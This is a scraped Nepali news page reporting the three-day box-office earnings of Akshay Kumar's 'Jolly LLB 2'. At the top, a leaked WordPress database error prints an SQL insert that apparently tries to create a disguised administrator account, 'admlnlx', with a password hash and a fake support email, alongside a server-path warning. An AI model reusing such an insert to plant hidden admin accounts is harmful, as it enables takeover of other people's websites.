WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BGOmpFfMQ8IZO.J9Eamr5HVVjBdGEt/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 11:51:16', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
३ दिनमै ५० करोड कमायो अक्षयको ‘जोली एलएलबी २’ले – Gaule Khabar

३ दिनमै ५० करोड कमायो अक्षयको ‘जोली एलएलबी २’ले

३ दिनमै ५० करोड कमायो अक्षयको ‘जोली एलएलबी २’ले

काठमाडौ,फागुन २-

बलिउडका चर्चित नायक अक्षय कुमार बक्स अफिसमा चम्किरहेका छन् । उनले अभिनय गरेका चलचित्रले बक्स अफिसमा लगातार चमत्कार व्यापार गरिरहेका छन् ।

उनै, अक्षय अभिनित नयाँ चलचित्र ‘जोली एलएलबी २’ले पनि बक्स अफिसमा आक्रामक व्यापारको रफ्तारलाई अगाडि बढाएको छ । चलचित्रले शुक्रबार १३.२० करोडको ओपनिङ गरेको थियो । तर, शनिबार चलचित्रको व्यापार बढ्यो र यसले १७.३१ करोडको कमाई गर्‍यो ।आइतबार बिदाको दिनलाई चलचित्रले झनै गतिलो सदुपयोग गरेको छ । आइतबार चलचित्रले १९.९५ करोडको कमाई गरेको छ । बक्स अफिसमा ३ दिनमा चलचित्रले ५०.४६ करोडको कमाई गरेको छ ।

चलचित्रले सोमबारदेखि व्यापारमा होल्ड गर्न सकेको खण्डमा सय करोड कमाउने पक्का छ । अहिले, भारतीय बक्स अफिसमा अक्षयका चलचित्रले सय करोड कमाइरहेका छन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका